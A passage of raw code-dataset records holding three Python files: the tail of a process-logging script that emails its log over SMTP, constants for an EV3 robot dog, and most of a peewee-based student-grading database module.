MIMEBase('application','octet-stream')\n\t\tp.set_payload((attachment).read())\n\t\tencoders.encode_base64(p)\n\t\tp.add_header('Content-Disposition',\"attachment;filename= %s\" % filename)\n\t\n\t\tmsg.attach(p)\n\t\ts = smtplib.SMTP('smtp.gmail.com',587)\n\t\ts.starttls()\n\t\ts.login(fromaddr,\"senderMailPassword\")\n\t\ttext = msg.as_string()\n\t\ts.sendmail(fromaddr,toaddr,text)\n\t\ts.quit()\n\t\tprint(\"log file successfully sent through mail...\")\n\t\t\n\texcept Exception as E:\n\t\tprint(\"Unable to send mail\",E)\n\n\ndef ProcessLog(log_dir = 'LogFile'):\n\tlistprocess = []\n\tif not os.path.exists(log_dir):\n\t\ttry:\n\t\t\tos.mkdir(log_dir)\n\t\texcept:\n\t\t\tpass\n\n\tseparator = "-" * 70\n\tlog_path = os.path.join(log_dir,\"AkshayPawar%s.log\"%(time.ctime()))\n\tf = open(log_path,'w')\n\tf.write(separator + \"\\n\")\n\tf.write(\"process logger: \"+time.ctime() + \"\\n\")\n\tf.write(separator + \"\\n\")\n\tf.write(\"\\n\")\n\n\tfor proc in psutil.process_iter():\n\t\ttry:\n\t\t\tpinfo = proc.as_dict(attrs = ['pid','name','username'])\n\t\t\tvms = proc.memory_info().vms/(1024*1024)\n\t\t\tpinfo['vms'] = vms\n\t\t\tlistprocess.append(pinfo)\n\t\texcept (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n\t\t\tpass\n\n\tfor element in listprocess:\n\t\tf.write(\"%s\\n\"%element)\n\n\tprint(\"Log file is successfully generated at location %s\"%(log_path))\n\tconnected = is_connected()\n\n\tif 
connected:\n\t\tstarttime = time.time()\n\t\tMailSender(log_path, time.ctime())\n\t\tendtime = time.time()\n\t\tprint(\"Took %s seconds to send mail\"%(endtime-starttime))\n\telse:\n\t\tprint(\"There is no Internet connection\")\n\t\n\ndef main():\n\tprint(\"Application name:\"+argv[0])\n\tif(len(argv) != 2):\n\t\tprint(\"Invalid number of argument...\")\n\t\texit()\n\tif(argv[1] == \"-h\") or (argv[1] == \"-H\"):\n\t\tprint(\"This script is used to log records of running processes...\")\n\t\texit()\n\tif(argv[1] == \"-u\") or (argv[1] == \"-U\"):\n\t\tprint(\"ApplicationName.py AbsolutePath_of_Directory\")\n\t\texit()\n\n\ttry:\n\t\tProcessLog()\n\t\t#schedule.every(int(argv[1])).minutes.do(ProcessLog)\n\t\t#while True:\n\t\t#\tschedule.run_pending()\n\t\t#\ttime.sleep(1)\n\texcept ValueError as E:\n\t\tprint(\"Error : Invalid input\",E)\n\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"akshaypawar696/processLogFile","sub_path":"processLogFile.py","file_name":"processLogFile.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7359475016","text":"from pybricks.parameters import Direction, Port\n\n# Wait time in milliseconds in between busy loop iterations.\nDEFAULT_WAIT_TIME = 10\n\n# The maximum speed of the leg axles. This value has been carefully measured\n# to ensure that the robot stays steady while executing an action.\nMAX_SPEED = 125\n\n# Default speed for all robot actions.\nDEFAULT_SPEED = MAX_SPEED // 2\n\n# Reset speed.\nRESET_SPEED = -DEFAULT_SPEED\n\n# The duty/actuation to apply to the motors during reset. This value has been\n# carefully measured to allow the legs to fold up but not jam into the model.\nRESET_DUTY = 40\n\n\n#### Front Leg Set\n\nFRONT_RIGHT_LEG_UPPER_PORT = Port.D\nFRONT_RIGHT_LEG_LOWER_PORT = Port.C\nFRONT_LEFT_LEG_UPPER_PORT = Port.A\nFRONT_LEFT_LEG_LOWER_PORT = Port.B\n\nFRONT_UPPER_DIRECTION = Direction.COUNTERCLOCKWISE\nFRONT_LOWER_DIRECTION = Direction.COUNTERCLOCKWISE\n\nFRONT_UPPER_GEARS = [8, 40]\nFRONT_LOWER_GEARS = [8, 40]\n\n# These angles have been carefully measured to provide a max upright position\n# while keeping the robot stable. An angle of 0 degrees is the folded up position.\nFRONT_MAX_UPRIGHT_UPPER_ANGLE = 60\nFRONT_MAX_UPRIGHT_LOWER_ANGLE = 120\n\n# Those angles are relative to the max upright angles.\nFRONT_MAX_LIFTUP_UPPER_ANGLE = 60\nFRONT_MAX_LIFTUP_LOWER_ANGLE = 40\n\n#### Back Leg Set\n\nBACK_RIGHT_LEG_UPPER_PORT = Port.A\nBACK_RIGHT_LEG_LOWER_PORT = Port.B\nBACK_LEFT_LEG_UPPER_PORT = Port.D\nBACK_LEFT_LEG_LOWER_PORT = Port.C\n\nBACK_UPPER_DIRECTION = Direction.CLOCKWISE\nBACK_LOWER_DIRECTION = Direction.CLOCKWISE\n\nBACK_UPPER_GEARS = [8, 40]\nBACK_LOWER_GEARS = [8, 40]\n\n# These angles have been carefully measured to provide a max upright position\n# while keeping the robot stable. 
An angle of 0 degrees is the folded up position.\nBACK_MAX_UPRIGHT_UPPER_ANGLE = 60\nBACK_MAX_UPRIGHT_LOWER_ANGLE = 120\n\n# XXX: Angles need to be determined.\n# Those angles are relative to the max upright angles.\nBACK_MAX_LIFTUP_UPPER_ANGLE = 0\nBACK_MAX_LIFTUP_LOWER_ANGLE = 135\n\n","repo_name":"strichter/ev3-dog","sub_path":"dog/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39562029919","text":"from peewee import SqliteDatabase, Model, CharField, IntegerField, \\\n FloatField, ForeignKeyField, PrimaryKeyField, DateField, DateTimeField, \\\n BooleanField, DoesNotExist, IntegrityError, OP, Expression, JOIN\nfrom os import getcwd, path, listdir, setpgrp\nfrom svn.local import LocalClient\nfrom utils import *\nfrom enum import Enum\nimport sys\nfrom subprocess import Popen, DEVNULL\nfrom functools import reduce\nimport socket\nimport re\nfrom collections import defaultdict\nfrom xml.dom.minidom import parse, Document\nfrom wrapt import ObjectProxy\n\n# from types import MethodType\n\ndb = SqliteDatabase('asp.sqlite')\nbackup_matcher = r\"asp.(\\d+).sqlite\"\nbackup_pattern = 'asp.{}.sqlite'\nos_db = SqliteDatabase(socket.gethostname() + '.sqlite')\n\n\nclass OS(Enum):\n OSX = 'darwin'\n LINUX = 'linux'\n\n # WIN = 'windows'\n\n @property\n def is_running(self):\n return self.value == sys.platform\n\n\n# Todo: make a @lazy decorator for methods\n\nclass Record(object):\n def __init__(self, data: dict = None, **kwargs):\n self.data = data.copy() if data else {}\n self.data.update(kwargs)\n self.id_values = None\n self.unique = {}\n\n def __get__(self, record, model=None):\n if not record is None:\n raise AttributeError('Record may not be called on class')\n\n if self.id_values:\n return self.sq_from_model(model, **self.id_values).get()\n\n # necesarry to enable self-reference of records in self-referencial models.\n def recursive(v):\n return v.__get__(None, model) if isinstance(v, type(self)) else v\n\n data = {k: recursive(v) for k, v in self.data.items()}\n\n funique = self.first_unique(model, True)\n filter = lambda k, v: k in funique\n r, created = self.get_or_create(model, *self.part_dict(data, filter))\n\n self.id_values = {fname: getattr(r, fname) for fname in\n self.primary_index(model)}\n\n if created:\n print(\"created {}: {}\".format(model, data))\n return r\n\n def first_unique(self, model, strict=False):\n try:\n return next(x for x in self.unique_indexes(model) if\n all(id in self.data for id in x))\n except StopIteration:\n if not strict:\n return model._meta.get_field_names()\n raise Exception(\n 'No unique index for record {} in {}\\nIndexes: {}'.format(\n self.data, model, self.unique_indexes(model)))\n\n @classmethod\n def unique_indexes(cls, model):\n r = [fields for fields, unique in model._meta.indexes if unique]\n r.append(cls.primary_index(model))\n return r\n\n @classmethod\n def unique_indexes(cls, model):\n r = [fields for fields, unique in model._meta.indexes if unique]\n r += [[n] for n, f in model._meta.fields.items() if f.unique]\n r.append(cls.primary_index(model))\n return r\n\n @classmethod\n def primary_index(cls, model):\n return tuple(f.name for f in model._meta.get_primary_key_fields())\n\n @classmethod\n def get_or_create(cls, model, key_values, defaults):\n sq = cls.sq_from_model(model, **key_values)\n try:\n return sq.get(), False\n except DoesNotExist:\n try:\n params = {k: v for k, v in 
key_values.items() if '__' not in k}\n params.update(defaults)\n with model._meta.database.atomic():\n return model.create(**params), True\n except IntegrityError as exc:\n try:\n return sq.get(), False\n except DoesNotExist:\n raise exc\n\n @classmethod\n def sq_from_model(cls, model, **kwargs):\n null_kvs, notnull_kvs = cls.part_dict(kwargs, lambda k, v: v is None)\n sq = model.select()\n if null_kvs:\n sq = sq.where(*(model._meta.fields[n].is_null() for n in null_kvs))\n if notnull_kvs:\n sq = sq.filter(**notnull_kvs)\n return sq\n\n @staticmethod\n def part_dict(d: dict, predicade=lambda k, v: v):\n return {k: v for k, v in d.items() if predicade(k, v)}, \\\n {k: v for k, v in d.items() if not predicade(k, v)}\n\n def __set__(self, obj, value):\n raise NotImplementedError\n # self.obj = value\n\n\nclass Searchable:\n fields = defaultdict(list)\n\n @classmethod\n def register(cls, f, *args, **kwargs):\n field = f(*args, **kwargs)\n temp_add = field.add_to_class\n\n def add_to_class(model_class, name):\n cls.fields[model_class].append(field)\n temp_add(model_class, name)\n\n field.add_to_class = add_to_class\n return field\n\n @classmethod\n def CharField(cls, *args, **kwargs):\n return cls.register(CharField, *args, **kwargs)\n\n @classmethod\n def IntegerField(cls, *args, **kwargs):\n return cls.register(IntegerField, *args, **kwargs)\n\n @classmethod\n def PrimaryKeyField(cls, *args, **kwargs):\n return cls.register(PrimaryKeyField, *args, **kwargs)\n\n @classmethod\n def query(cls, model_classes, value, op=OP.IN):\n def coercable(f, v):\n try:\n f.coerce(v)\n return True\n except:\n return False\n\n nodes = [Expression(f, op, value) for m in model_classes\n for f in cls.fields[m] if coercable(f, value)]\n\n return reduce(lambda f, old: (f) | (old), nodes, True)\n\n\nclass BaseModel(Model):\n @property\n def format_vars(self):\n\n rv = FormatDict()\n field_names = self._meta.get_field_names()\n class_keys = [k for k, v in self.__class__.__dict__.items() if\n isinstance(v, property)]\n rv.add_data(field_names, self)\n rv.add_data(class_keys, self)\n return rv\n\n @property\n def field_values(self):\n return {f: getattr(self, f) for f in self._meta.get_field_names()}\n\n @classmethod\n def const_records(cls):\n return {n: getattr(cls, n) for n, a in cls.__dict__.items() if\n isinstance(a, Record)}\n\n def get_pk_names(self):\n for pk in self._meta.get_primary_key_fields():\n yield pk.name\n\n def clone(self):\n d = {k: v for k, v in self.field_values.items() if\n k not in self.get_pk_names()}\n return type(self)(**d)\n\n @classproperty\n def searchable(cls):\n return [cls]\n\n @classmethod\n def search_completer(cls, models=None):\n if models is None:\n models = cls.searchable\n\n def completer(cls, text, state):\n rm = cls._meta.related_models(True)\n # return []\n\n return completer\n\n @classmethod\n def related_paths(cls, limit=None, backrefs=True):\n model_paths = defaultdict(list)\n stack = [(cls, None)]\n while stack:\n model, parent = stack.pop(0)\n if model_paths[model]:\n continue\n if parent:\n model_paths[model] += model_paths[parent]\n model_paths[model].append(model)\n\n for fk in model._meta.rel.values():\n stack.append((fk.rel_model, model))\n if backrefs:\n for fk in model._meta.reverse_rel.values():\n stack.append((fk.model_class, model))\n if not limit:\n return dict(model_paths)\n return {k: v for k, v in model_paths.items() if len(v) <= limit}\n\n class Meta:\n database = db\n\n\nclass FileCommand(BaseModel):\n command = CharField()\n shell = 
BooleanField(default=False)\n\n OPEN = Record(id=1,\n command='open -nW' if OS.OSX.is_running else 'gnome-open')\n ANDROID_STUDIO = Record(id=3,\n command='open -n /Applications/Android\\ Studio.'\n 'app/ --args' if OS.OSX.is_running else 'android-studio',\n shell=True)\n DIFF = Record(id=4,\n command='open -W /Applications/DiffMerge.app/ --args'\n '' if OS.OSX.is_running else 'meld')\n\n SHELL_ALL_DEVNULL = dict(\n shell=True,\n stdin=DEVNULL,\n stdout=DEVNULL,\n stderr=DEVNULL\n )\n\n DEFAULT_POPEN_ARGS = dict(\n preexec_fn=setpgrp,\n # lambda: signal.signal(signal.SIGINT,signal.SIG_IGN)\n )\n\n def open(self, *args, **kwargs):\n cmd = [s.replace('\\ ', ' ') for s in\n re.split(r'(?<!\\\\) ', self.command)] + list(args)\n print(str(cmd))\n ukwargs = self.DEFAULT_POPEN_ARGS.copy()\n if self.shell:\n ukwargs.update(self.SHELL_ALL_DEVNULL)\n ukwargs.update(kwargs)\n return Popen(cmd, **ukwargs)\n\n class Meta:\n database = os_db\n\n\n# safely create FileCommand table, its const records are referenced in FileType\nos_db.create_tables([FileCommand], safe=True)\n\n\nclass FileType(BaseModel):\n type = CharField()\n mime = CharField(null=True, default=None)\n command = ForeignKeyField(FileCommand, null=True, default=None)\n\n DIR = Record(id=1, type=\"Directory\")\n PDF = Record(id=2, type=\"PDF\", command=FileCommand.OPEN)\n TXT = Record(id=3, type=\"TXT\", command=FileCommand.OPEN)\n XML = Record(id=4, type=\"XML\", command=FileCommand.OPEN)\n ASP = Record(id=5, type=\"AS Project\", command=FileCommand.ANDROID_STUDIO)\n\n OTH = Record(id=10, type=\"unknown file\")\n\n @property\n def readable(self):\n return self.command is not None\n\n def open(self, *args, **kwargs):\n return self.command.open(*args, **kwargs)\n\n\n# safely create FileType table, its const records are referenced in Directory\nos_db.create_tables([FileType], safe=True)\n\n\nclass Hierarchy:\n class Method:\n def __init__(self, f, instance=None, typ=None):\n self.function = f\n self.instance = instance\n self.type = typ\n\n def __get__(self, obj, type=None):\n return self.__class__(self.function, obj, type)\n\n @property\n def method(self):\n return self.get_method(self.instance)\n\n def get_method(self, instance, typ=None):\n if typ is None:\n typ = self.type\n assert isinstance(instance, Hierarchy), TypeError(\n '{} is no {}'.format(instance, Hierarchy.__name__))\n return self.function.__get__(instance, typ)\n\n def __call__(self, *args, **kwargs):\n raise NotImplementedError\n\n class AncestorMethod(Method):\n def __call__(self, *args, **kwargs):\n m, p = self.method, self.instance.parent\n if p: yield from getattr(p, m.__name__,\n self.get_method(p))(*args, **kwargs)\n yield m(*args, **kwargs)\n\n class DescendantMethod(Method):\n def __call__(self, *args, **kwargs):\n m = self.method\n yield m(*args, **kwargs)\n for c in self.instance.children:\n yield from getattr(c, m.__name__,\n self.get_method(c))(*args, **kwargs)\n\n @property\n def children(self):\n raise NotImplementedError('must be overridden.')\n\n @property\n def parent(self):\n raise NotImplementedError('must be overridden.')\n\n @property\n def descendants(self):\n return self.get_descendants()\n\n @DescendantMethod\n def get_descendants(self):\n return self\n\n @staticmethod\n def get(*args):\n for h in args:\n yield from h.descendants\n\n @property\n def ancestors(self):\n return self.get_ancestors()\n\n @AncestorMethod\n def get_ancestors(self):\n return self\n\n def __gt__(self, other):\n return other in self.ancestors\n\n def __lt__(self, other):\n 
return self in other.ancestors\n\n\nclass DirectoryBase(Hierarchy):\n @property\n def absolute(self):\n raise NotImplementedError('must be overridden.')\n\n def open(self):\n return self.file_type.open(self.absolute)\n\n def open_if_exists(self):\n if self.exists:\n return self.open()\n\n def create_if_not_exists(self):\n if not self.exists:\n f = open(self.absolute, 'x')\n f.close()\n return True\n return False\n\n @property\n def path(self):\n raise NotImplementedError('must be overridden.')\n\n def relpath(self, other):\n return path.relpath(self.absolute, other.absolute)\n\n @property\n def repository_dir(self):\n raise NotImplementedError('must be overridden.')\n\n @property\n def relative_to_repo(self):\n # assert self > self.repository_dir, '{} is no subdir of {}!'.format(\n # self, self.repository_dir)\n return self.relpath(self.repository_dir)\n\n def read_file(self):\n if hasattr(self, '_read_file_data'):\n print('file {} was already read.'.format(self.path))\n return self._read_file_data\n\n assert self.exists and self.file_type and self.file_type.readable\n if self.file_type == FileType.XML:\n self._read_file_data = parse(self.absolute)\n else:\n f = open(self.absolute)\n self._read_file_data = f.read()\n f.close()\n\n return self._read_file_data\n\n def save_file(self, data=None):\n if data is None:\n assert hasattr(self, '_read_file_data')\n data = self._read_file_data\n if self.file_type == FileType.XML:\n assert isinstance(data, Document)\n data = data.toxml()\n\n f = open(self.absolute, 'w')\n f.write(data)\n f.close()\n\n @property\n def type(self):\n # TODO: remove this\n return self.Type(self.Type.testDir(self.absolute))\n\n @property\n def file_type(self):\n raise NotImplementedError('must be overridden.')\n\n @property\n def exists(self):\n if self.parent:\n return self.parent.exists and self.type.exists(self.path,\n self.parent.absolute)\n else:\n return path.exists(self.absolute)\n\n def __str__(self):\n return '<{}: {}>'.format(type(self), self.absolute)\n\n class Type(Enum):\n File = 0\n Directory = 1\n\n @property\n def test(self):\n return path.isdir if self.value else path.isfile\n\n @classmethod\n def exists(cls, pth, root):\n for p in cls.split(pth):\n if p not in listdir(root) + ['.', '..']:\n return False\n root = path.join(root, p)\n return True\n\n @classmethod\n def split(cls, pth):\n r = path.normpath(pth).split(path.sep)\n return r if r[0] or not r else r[1:]\n # a, b = path.split(pth)\n # return (cls.split(a) if len(a) and len(b) else []) + [b]\n\n @staticmethod\n def testDir(pth):\n return (path.altsep and pth.endswith(path.altsep)) or pth.endswith(\n path.sep)\n\n\nclass Student(BaseModel):\n first_name = Searchable.CharField()\n last_name = Searchable.CharField()\n mail = CharField(unique=True)\n rep = IntegerField()\n ects = IntegerField()\n user = Searchable.CharField(unique=True)\n\n @property\n def name(self):\n return self.first_name + \" \" + self.last_name\n\n def __str__(self):\n return self.name\n\n @property\n def generated_user(self):\n return self.last_name.lower()[:7] + self.first_name.lower()[0]\n\n\nclass Category(BaseModel):\n name = Searchable.CharField()\n\n FutureHints = Record(id=1, name='Hints for future submissions')\n ProjectStructure = Record(id=2, name='Project Structure')\n Warning = Record(id=3, name='Warning')\n Other = Record(id=4, name='Other')\n\n def __str__(self):\n return \"{}: {}\".format(type(self).__name__, self.name)\n\n\nclass Exercise(BaseModel):\n nr = Searchable.PrimaryKeyField()\n published = 
DateField(formats=['%Y-%m-%d', '%d.%m.%Y'])\n due = DateTimeField(formats=['%Y-%m-%d %H:%M:%S', '%d.%m.%Y %H:%M:%S'])\n\n @property\n def Name(self):\n return \"Exercise Sheet {}\".format(self.nr)\n\n def __str__(self):\n return self.Name\n\n @property\n def max_points(self):\n return sum(c.max_points for c in self.tasks)\n\n @property\n def root_tasks(self):\n return Task.select().where(Task.parent.is_null(), Task.ex == self)\n\n def existing_comments(self, s: Student):\n return Comment.select().join(ExerciseComment).where(\n ExerciseComment.ex == self,\n ExerciseComment.student == s)\n\n def existint_others(self, s: Student):\n return Comment.select().join(ExerciseComment).where(\n ExerciseComment.ex == self,\n ExerciseComment.comment.not_in(self.existing_comments(s)))\n\n @property\n def all_comments(self):\n return Comment.select().join(ExerciseComment).where(\n ExerciseComment.ex == self,\n ExerciseComment.cat != Category.ProjectStructure) | \\\n Comment.select().join(\n GradingComment).join(Grading).join(Task).where(\n (Grading.ex == self) | (Task.ex == self))\n\n @property\n def completed(self):\n return all(GradingStatus(self, s).completed for s in Student)\n\n\nclass Task(BaseModel, Hierarchy):\n name = Searchable.CharField()\n parent = ForeignKeyField('self', related_name='children', null=True)\n ex = ForeignKeyField(Exercise, related_name='tasks', null=True)\n max_points = FloatField(default=0)\n always_processed = BooleanField(default=False)\n hidden_question = BooleanField(default=False)\n\n Report = Record(name='Report', max_points=2, ex=None)\n Comments = Record(name='Comments', max_points=2, ex=None)\n CodeQuality = Record(name='Code Quality', max_points=2, ex=None,\n always_processed=True)\n Usability = Record(name='Usability', max_points=2, ex=None,\n always_processed=True)\n\n @classmethod\n def general_tasks(cls):\n return cls.select().where(cls.ex.is_null())\n\n @classmethod\n def general_root_tasks(cls):\n return cls.select().where(cls.ex.is_null(), cls.parent.is_null())\n\n @classmethod\n def specific_tasks(cls):\n return cls.select().where(cls.ex.is_null(False))\n\n @property\n def is_general(self):\n return self.ex is None\n\n @property\n def depth(self):\n return self.parent.depth + 1 if self.parent else 0\n\n @property\n def visible_depth(self):\n return self.parent.visible_depth + int(\n not self.hidden_question) if self.parent else 0\n\n @property\n def total_max_points(self):\n return self.max_points + sum(c.total_max_points for c in self.children)\n\n def get_grading(self, s: Student, ex: Exercise = None):\n queries = [Grading.student == s, Grading.task == self]\n if self.ex is None:\n queries.append(Grading.ex == ex)\n elif self.ex != ex:\n raise DoesNotExist('requested exercise number {} does not '\n 'match task\\'s ({})'.format(self.ex, ex))\n try:\n return Grading.get(*queries)\n except DoesNotExist:\n g = Grading()\n g.student = s\n g.task = self\n if not self.ex:\n g.ex = ex\n return g\n\n @classproperty\n def searchable(cls):\n return [cls, Exercise]\n\n def __str__(self):\n return \"Task \" + \" > \".join(t.name for t in self.ancestors)\n\n class Meta:\n indexes = (\n (('name', 'ex'), True),\n )\n\n\nclass GradingStatus:\n def __init__(self, ex: Exercise, s: Student):\n self.ex = ex\n self.stud = s\n\n @property\n def tasks(self):\n for t in self.root_tasks:\n yield from t.descendants\n\n @property\n def root_tasks(self):\n yield from Task.general_root_tasks()\n yield from self.ex.root_tasks\n\n @property\n def general_gradings(self):\n return 
self.get_desc_gradings(*Task.general_root_tasks())\n\n @property\n def specific_gradings(self):\n return self.get_desc_gradings(*self.ex.root_tasks)\n\n @property\n def gradings(self):\n yield from self.general_gradings\n yield from self.specific_gradings\n\n def get_gradings(self, *tasks):\n for t in tasks:\n try:\n yield t.get_grading(self.stud, self.ex)\n except DoesNotExist:\n pass\n\n def get_desc_gradings(self, *tasks):\n yield from self.get_gradings(*Hierarchy.get(*tasks))\n\n def make_failed(self, *tasks):\n return all(g.make_failed() for g in self.get_gradings(*tasks))\n\n @property\n def total_points(self):\n return sum(g.total_points for g in self.get_gradings(*self.root_tasks)) \\\n + sum(c.add_in_total_ex_points for c in self.gradings) \\\n + sum(c.point_modifier for c in self.ex_comments)\n\n @property\n def progress(self):\n return self.Partition((g, g.status) for g in self.gradings)\n\n @property\n def completed(self):\n return all(g.completed for g in self.gradings)\n\n @property\n def started(self):\n return any(g.status for g in self.gradings)\n\n def __str__(self):\n return \"{}\\n{}\".format('completed' if self.completed else 'incomplete',\n self.progress)\n\n @property\n def status(self):\n return self.Values(self.started + self.completed)\n\n @property\n def ex_comments(self):\n return Comment.select().join(ExerciseComment).where(\n ExerciseComment.ex == self.ex,\n ExerciseComment.student == self.stud)\n\n @property\n def gr_comments(self):\n return Comment.select().join(GradingComment).join(Grading).join(\n Task).where((Grading.ex == self.ex) | (Task.ex == self.ex))\n\n\n @property\n def all_comments(self):\n return self.gr_comments | self.ex_comments\n\n class Partition:\n def __init__(self, items):\n self.d = {}\n for t, s in items:\n self.d.setdefault(s, [])\n self.d[s].append(t)\n\n @property\n def all_items(self):\n return [i for v in self.d.values() for i in v]\n\n def __len__(self):\n return len(self.all_items)\n\n def items(self, key):\n return self.d.get(key)\n\n def absolute(self, key):\n return len(self.items(key))\n\n def relative(self, key):\n return self.absolute(key) / len(self)\n\n def __str__(self):\n return \"\\n\".join(\n '{k}: {abs}/{tot} ({rel:.1%})'.format(k=k.name,\n abs=self.absolute(k),\n tot=len(self),\n rel=self.relative(k))\n for k in self.d)\n\n class Values(AddEnum):\n OPEN = 0\n STARTED = 1\n COMPLETED = 2\n\n def __bool__(self):\n return bool(self.value)\n\n\nclass Comment(BaseModel):\n # id = PrimaryKeyField()\n # task = ForeignKeyField(Task, related_name='comments', null=True)\n message = Searchable.CharField()\n point_modifier = FloatField(default=0)\n visible = BooleanField(default=True)\n\n ProjectPathMissing = Record(id=1,\n message=\"There was nothing committed.\",\n point_modifier=0)\n IdeaProjectFolderMissing = Record(id=2,\n message=\"The {name} is missing! 
Please commit the whole AS project.\",\n point_modifier=0)\n CommittedIgnoredItems = Record(id=3,\n message=\"There were items committed that \"\n \"should be ignored.\",\n point_modifier=-0.5)\n MissingItems = Record(id=4,\n message=\"There were important items missing.\",\n point_modifier=-2)\n MissingManifest = Record(id=5, message=\"The Android Manifest is missing.\",\n point_modifier=-2)\n ReportReminder = Record(id=6, message=\"Don't forget the report next time!\",\n point_modifier=0)\n # ReportMissing = Record(id=7, message=\"You have not committed a Report.\",\n # point_modifier=-2)\n reserved7 = Record(id=7, message=\"reserved comment 7\", point_modifier=0)\n ForgiveCommittedIgnoredItems = Record(id=8,\n message=\"For this exercise it is ok \"\n \"to have submitted ignored files.\",\n point_modifier=0.5)\n reserved9 = Record(id=9, message=\"reserved comment 9\", point_modifier=0)\n\n # The report is not mandatory for the first exercise but keep it in mind for the other exercises.\n\n def __str__(self):\n visible_str = '' if self.visible else '[invisible] '\n return '{}{} {}'.format(visible_str, self.message, self.point_str)\n\n @property\n def point_str(self):\n return '({})'.format(\n self.point_modifier) if self.point_modifier else ''\n\n def format(self, *args, **kwargs):\n self.message = self.message.format(*args, **kwargs)\n return self\n\n @property\n def categories(self):\n return Category.select().distinct().join(ExerciseComment).where(\n ExerciseComment.id << self.ex_coms)\n\n @property\n def tasks(self):\n return Task.select().distinct().join(Grading).join(\n GradingComment).where(\n GradingComment.id << self.gradings)\n\n @property\n def used(self):\n return self.ex_coms.count() + self.gradings.count()\n\n def get_contexts(self, ex: Exercise, s: Student):\n r = []\n for t in self.tasks:\n try:\n r.append(t.get_grading(s, ex))\n except DoesNotExist:\n pass\n return r + list(self.categories)\n\n def add_context(self, context, s, ex):\n if isinstance(context, Task):\n g = context.get_grading(s, ex)\n assert g.status, DoesNotExist('Grading missing.')\n return GradingComment.get_or_create(\n grading=g,\n comment=self)\n elif isinstance(context, Category):\n return ExerciseComment.get_or_create(student=s, ex=ex,\n cat=context,\n comment=self)\n else:\n raise TypeError('invalid context: {}'.format(context))\n\n def move_to(self, context):\n queries = {q.model_class: list(q) for q in\n (GradingComment.select().where(\n GradingComment.comment == self),\n ExerciseComment.select().where(\n ExerciseComment.comment == self))}\n\n moved = {\n GradingComment: 0,\n ExerciseComment: 0\n }\n\n for c, l in queries.items():\n for rel in list(l):\n s, ex = rel.student, rel.ex\n added, nrel = self.add_context(context, s, ex)\n if added:\n rel.delete_instance()\n moved[c] += 1\n\n return {k.__name__:\n {'moved': v, 'untouched': len(list(queries[k])) - v}\n for k, v in moved.items()}\n\n def used_for(self, s: Student, ex: Exercise):\n q1where = (ExerciseComment.student == s, ExerciseComment.ex == ex)\n q1 = self.categories.where(*q1where)\n\n q2where = (Grading.student == s, (Task.ex == ex) | (Grading.ex == ex))\n q2 = self.tasks.where(*q2where)\n r_lst = list(q1) + list(q2)\n\n return len(r_lst)\n\n def used_in_Exercises(self, s: Student = None):\n q1where = [ExerciseComment.id << self.ex_coms]\n q2where = [GradingComment.id << self.gradings]\n\n if s is not None:\n q1where.append(ExerciseComment.student == s)\n q2where.append(Grading.student == s)\n\n q1 = 
Exercise.select().join(ExerciseComment).where(*q1where)\n q2 = Grading.select().join(GradingComment).where(*q2where)\n\n r = []\n for e in list(q1) + [g.true_ex for g in q2]:\n if e not in r:\n r.append(e)\n\n return r\n\n @classmethod\n def get_unused(cls):\n return [c for c in cls if not c.used]\n\n @classmethod\n def get_unused_noconst(cls):\n return [c for c in cls if\n not (c.used or c.id in [cn.id for cn in\n cls.const_records().values()])]\n\n @classproperty\n def searchable(cls):\n return [cls, Task, Category]\n\n class Created(AddEnum):\n Existed = 0\n Added = 1\n New = 2\n\n def __str__(self):\n return [\n 'The comment existed and had already been added.',\n 'The comment existed, but now was added.',\n 'The comment was created and added.',\n ][self.value]\n\n\nclass Grading(BaseModel, Hierarchy):\n student = ForeignKeyField(Student)\n task = ForeignKeyField(Task, related_name='gradings')\n ex = ForeignKeyField(Exercise, null=True)\n processed = BooleanField(\n help_text='Has the student has worked on the task at all?')\n completed = BooleanField(default=False)\n point_modifier = FloatField(default=0)\n\n def existing_comments(self):\n return Comment.select().join(GradingComment).where(\n GradingComment.grading != self).join(Grading).where(\n Grading.task == self.task)\n\n @property\n def true_ex(self):\n return self.ex or self.task.ex\n\n def __str__(self):\n return \"{}: {} {}\".format(self.task.name, self.print_processed,\n self.print_points)\n\n @property\n def visible(self):\n return not self.task.hidden_question\n # (not self.task.hidden_question) or self.lost_points\n\n @Hierarchy.DescendantMethod\n def make_failed(self):\n self.processed = False\n self.completed = True\n return self.save()\n\n @Hierarchy.AncestorMethod\n def uncomplete(self):\n self.completed = False\n return self.save()\n\n @Hierarchy.AncestorMethod\n def make_processed(self):\n self.processed = True\n return self.save()\n\n def complete(self):\n self.completed = True\n return self.save() and all(g.complete() for g in self.children)\n\n @property\n def print_processed(self):\n if self.task.always_processed:\n return \"\"\n return \"Ok.\" if self.processed else \"Missing.\"\n\n @property\n def zero_points(self):\n return not (self.processed or self.task.always_processed)\n\n @property\n def add_in_total_ex_points(self):\n return (- self.task.max_points) if self.task.is_general else 0\n\n @property\n def points(self):\n if self.zero_points:\n return 0\n else:\n return self._point_modifiers + self.task.max_points\n\n @property\n def _point_modifiers(self):\n return self.point_modifier + sum(\n gc.comment.point_modifier for gc in self.comments)\n\n @property\n def children(self):\n for st in self.task.children:\n try:\n yield st.get_grading(self.student, self.task.ex)\n except DoesNotExist:\n pass\n\n @property\n def parent(self):\n if self.task.parent:\n return self.task.parent.get_grading(self.student, self.task.ex)\n\n @property\n def total_points(self):\n result = 0\n if not self.zero_points:\n result += self.points + sum(c.total_points for c in self.children)\n # sum(c.total_points for c in self.children)\n if result < 0 and self.task.total_max_points:\n print('points for {} were {}, cut off at 0.'.format(self.task,\n result))\n return 0\n return result\n\n @property\n def lost_points(self):\n return self.total_points < self.task.total_max_points\n\n @property\n def print_points(self):\n if self.task.total_max_points:\n s = '({} / {} points)'\n elif self.total_points:\n s = '({} points)'\n else:\n s = 
